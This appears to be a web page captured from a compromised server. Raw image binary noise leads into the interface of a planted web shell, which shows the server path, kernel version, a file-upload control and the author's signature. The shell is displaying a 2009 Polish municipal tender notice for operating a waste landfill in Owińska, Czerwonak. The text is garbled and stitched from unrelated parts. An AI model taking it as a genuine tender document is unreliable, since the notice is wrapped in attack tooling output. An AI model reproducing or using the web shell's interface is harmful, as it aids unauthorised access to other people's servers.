JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23644-N-2009.html

<p class="kh_header"><b>Czerwonak: BIEŻĄCA EKSPLOATACJA SKŁADOWISKA ODPADÓW 
INNYCH NIŻ NIEBEZPIECZNE I OBOJĘTNE W ZAKRESIE SKŁADOWANIA ODPADÓW</b><br>
<b>Numer ogłoszenia: 23644 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwonak , ul. Źródlana 39, 62-004 Czerwonak, woj. wielkopolskie, tel. 061 6544204, faks 061 8120270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerwonak.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCA EKSPLOATACJA SKŁADOWISKA ODPADÓW 
INNYCH NIŻ NIEBEZPIECZNE I OBOJĘTNE W ZAKRESIE SKŁADOWANIA ODPADÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest wykonanie zadania pod nazwą: bieżąca eksploatacja składowiska odpadów innych niż niebezpieczne i obojętne w zakresie składowania odpadów w miejscowości Owińska, gmina Czerwonak
2)	Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
	NAZWA	Słownictwo główne 
Główny przedmiot	Eksploatacja składowisk odpadów	90.53.00.00-1

3)	Wykonawca zobowiązany jest prowadzić prace polegające na przyjmowaniu odpadów na wyznaczonej kwaterze i składować je w sposób bezpieczny i uporządkowany, zgodny z instrukcją odpadów innych niż niebezpieczne i obojętne.
4)	Zakres robót obejmuje:
1)	Odpady składowane są na kwaterze nr I o powierzchni uszczelnieniowej w obrysie krawędzi wewnętrznych koron 1,1 ha, a w dnie 0,8 ha.
2)	przewidywana ilość odpadów do zagospodarowania - średnio 8000 Mg rocznie.
3)	wykonywanie warstwy izolacyjnej o grubości 15-20 cm warstwy, w jakich są składowane odpady powinny mieć grubość 2,0-2,5 m, zgodnie z technologią określoną w instrukcji eksploatacji.
4)	utrzymanie brodzika dezynfekcyjnego.
5)	zapewnienie stałej obsługi urządzeń wagowych przez przeszkolonego pracownika.
6)	odwyższanie wału ziemnego.
7)	utrzymanie (remonty) istniejących dróg technologicznych i organizowanie dróg technologicznych.
8)	utrzymanie przejezdności dróg dojazdowych i technologicznych : w okresie zimowym zwalczanie gołoledzi i odśnieżanie, w pozostałym okresie zapobieganie ich pyleniu poprzez polewanie wodą w okresie suszy i silnego wiatru.
9)	oznakowanie dróg technologicznych dla zapewnienia bezkolizyjnego poruszania się pojazdów na terenie składowiska odpadów.
10)	ochrona p.poż. - zabezpieczenie składowanych odpadów przed pożarem (polewanie wodą odpadów, zabezpieczanie warstwą izolacyjną ziemi).
11)	oświetlenie terenu (istniejące oświetlenie).
12)	utrzymanie porządku i czystości na terenie składowiska i wokół niego poprzez systematyczne zbieranie wszystkich wywiewanych frakcji odpadów oraz umieszczenie stosownych zabezpieczeń.
13)	zapewnienie awaryjnej pomocy technicznej pojazdom przewożącym odpady w przypadku trudności z wyjazdem z punktu zrzutu odpadów.
14)	Wykonawca we własnym zakresie zapewni odpowiednią, brakującą ilość gruzu i ziemi niezbędnych dla właściwego przesypywania kolejnych warstw składowanych odpadów oraz do budowy dróg technologicznych na składowisku.
15)	Wykonawca ponosi koszy zużycia mediów.
16)	w przypadku zniszczenia urządzeń służących do monitoringu, np. piezometry, repery, a znajdujących się na terenie składowiska oraz urządzenia pomiarowe w zbiorniku odcieków, koszt ich naprawy lub wymiany ponosi Wykonawca.
17)	Wykonawca zobowiązany jest dokonywać recyrkulacji odcieków na terenie składowiska.
18)	Wykonawca zobowiązany jest sygnalizować Zamawiającemu konieczność wywozu odcieków z właściwym wyprzedzeniem. Badania składu odcieków i ich wywozu stanowi koszt Zamawiającego i nie jest wliczane do ceny za eksploatację składowiska odpadów.
19)	Wykonawca zobowiązany jest prowadzić kontrolę poziomu odcieków w zbiornikach retencyjnych poprzez wpisywanie do zeszytu kontroli ( codziennie ).
20)	Wykonawca utrzymuje zieleń znajdującą się na składowisku odpadów w granicach ogrodzenia.
21)	Badania monitoringowe przeprowadza Zamawiający.
22)	Wykonawca prowadzi dokumentację eksploatacji składowiska za wyjątkiem kart ewidencji komunalnych osadów ścieków.
23)	Konserwacja drenażu.
24)	Opróżnianie zbiornika bezodpływowego ścieków pochodzących z urządzeń sanitarnych budynków socjalnych oraz budynku wagowego.
25)	Wykonawca zapewni narzędzia i sprzęt warsztatowy oraz zabezpieczy sprzęt przeciwpożarowy (np. ziemia+ urządzenia do gaszenia pożaru);
5)	Szczegółowy opis przedmiotu zamówienia zawiera część II SIWZ oraz Instrukcja eksploatacji składowiska odpadów zlokalizowanego w miejscowości Owińska, gmina Czerwonak, zatwierdzona decyzją Nr SR-II-2-6623-1/03 Wojewody Wielkopolskiego z dnia 29 kwietnia 2003 r., stanowiąca załącznik nr 1 do opisu przedmiotu zamówienia. 
6)	Rodzaj i ilość odpadów dopuszczonych do składowania określa decyzja Nr SR.V-5.6600-97/07 Wojewody Wielkopolskiego z dnia 24 grudnia 2007 r. - stanowiąca załącznik nr 2 do opisu przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.53.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1)	Wysokość wadium.
Wykonawca zobowiązany jest wnieść wadium w wysokości 10 000,00 zł (słownie: dziesięć_tysięcy_złotych).
2)	Forma wadium.
Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. t.j. z 2007r. Nr 42, poz. 275).
3)	Miejsce i sposób i termin wniesienia wadium.
a)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Bank Zachodni WBK S.A. VII O. Poznań nr rachunku: 24 1090 1737 0000 0001 0792 9837 na przelewie należy umieścić informację wadium - eksploatacja składowiska odpadów
b)	Wadium w pozostałych akceptowanych formach należy składać w oryginale w siedzibie Zamawiającego - Urząd Gminy Czerwonak, ul. Źródlana 39, pok. 102, w terminie do dnia 18 lutego 2009r. do godziny 10:00,
c)	do oferty należy dołączyć kserokopię wnoszonego wadium. 
d)	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
e)	W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 Pzp), tj.
(1)	posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (art. 22 ust. 1 pkt 2 Pzp),tj.:
(1)	dysponują lub będą dysponować osobami:
-	1 osobą pełniącą funkcję kierownika składowiska odpadów i osoba ta posiada świadectwo stwierdzające kwalifikacje w zakresie gospodarowania odpadami, zgodnie z art. 62 w związku z art. 49 ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz.U. t.j. z 2007r. Nr 39, poz. 251 ze zmianami)
-	2 osobami przewidzianymi do realizacji zamówienia - operator sprzętu; 
-	2 osobami przewidzianymi do realizacji zamówienia - rejestrator; 
-	3 osobami przewidzianymi do realizacji zamówienia - dozorca (portier);
(2)	w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, świadczyli lub świadczą usługę, eksploatacji składowiska odpadów, której wartość wynosi minimalnie 200.000 zł; 
(3)	dysponują lub będą dysponować nw. niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, tj.: 
-	kompaktorem - 1szt., 
-	przyczepą ciężarową - 1 szt., 
-	przyczepą asenizacyjną - 1 szt., 
-	spycharką gąsienicową - 1 szt., 
-	koparką - 1szt., 
-	ciągnikiem - 1 szt., 
-	opłotowaniem przenośnym - 700 m, 
-	kosiarką spalinową - 1 szt., 
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3 Pzp),tj.:
(1)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie niższą niż 100 000,00 zł; 
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Pzp.
2)	Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty, zgodnie z formułą spełnia - nie spełnia.
3)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia zobowiązani są do ustanowienia pełnomocnika celem reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	W celu wykazania spełnienia warunków udziału w postępowaniu opisanych powyżej, 
każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia lub dokumenty:
a)	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Pzp, stanowiące załącznik nr 1 do formularza oferty 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia - oświadczenie ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku),
b)	oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 Pzp, stanowiące załącznik nr 2 do formularza oferty 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe oświadczenia dla każdego z nich),
c)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), 
d)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzony na podstawie wzoru stanowiącego załącznik nr 3 do formularza oferty. Wykaz winien zawierać informacje potwierdzające spełnienie warunku opisanego  powyżej w pkt 1) lit. b) ppkt 1 
(w przypadku wspólnego ubiegania się dwóch lub więcej Uczestników o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy oraz łączne kwalifikacje),
e)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej lit. d), wykonawca wskazał osoby, którymi będzie dysponował,
f)	dokumenty stwierdzające, że osoba, która pełnić będzie funkcję kierownika składowiska, posiada uprawnienia wynikające z art. art. 62 w związku z art. 49 ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz.U. t.j. z 2007r. Nr 39, poz. 251 ze zmianami), tj. świadectwo stwierdzające kwalifikacje w zakresie gospodarowania odpadami,
g)	wykaz wykonanych/wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, sporządzony na podstawie wzoru stanowiącego załącznik nr 4 do formularza oferty. Wykaz winien zawierać informacje potwierdzające spełnienie warunku opisanego powyżej w pkt1) lit. b) (2) oraz dokumenty potwierdzające, że usługi zostały wykonane należycie;
(w przypadku wspólnego ubiegania się dwóch lub więcej Uczestników o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie),
h)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponowł Wykonawca, na podstawie wzoru stanowiącego załącznik nr 5 do formularza oferty. Wykaz winien zawierać informacje potwierdzające spełnienie warunku opisanego powyżej w pkt 1) lit. b) ppkt 3 
i)	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa powyżej lit. h), wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,
j)	polisa, a w przypadku jej braku inny dokument ubezpieczenia, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - złożona zgodnie z punktem powyżej 1) lit.c) (1)  
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku),
k)	dowód wniesienia wadium.
2)	Postanowienia dotyczące Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej: 
stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich dokumenty te mogą być składane (Dz. U. Nr 87, poz. 605 ze zmianami):
a)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1) lit. c, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
Przedmiotowy dokument/y, powinien być wystawiony/e nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 
b)	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej - lit a), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Ważność dokumentów- jak w lit. a).
3)	Ponadto Wykonawca składa:
a)	ofertę, wg wzoru oferty, stanowiącego część III SIWZ;
b)	dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, a podpisywana jest przez pełnomocnika;
c)	stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
4)	Dokumenty są składane w formie oryginału lub kopii poświadczonej ZA ZGODNOŚĆ Z ORYGINAŁEM przez Wykonawcę. Pełnomocnictwa należy złożyć w oryginale lub poświadczonej przez notariusza kopii. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym - jak wyżej - przez Wykonawcę. 
5)	Jeżeli termin składania ofert ulegnie przesunięciu, wówczas dokumenty, które do tego czasu utraciły swą ważność winny zostać uaktualnione..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.czerwonak.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwonak ul. Źródlana 39, 62-004 Czerwonak, pok. 210.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 10:00, miejsce: Urząd Gminy Czerwonak ul. Źródlana 39, 62-004 Czerwonak, pok. 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com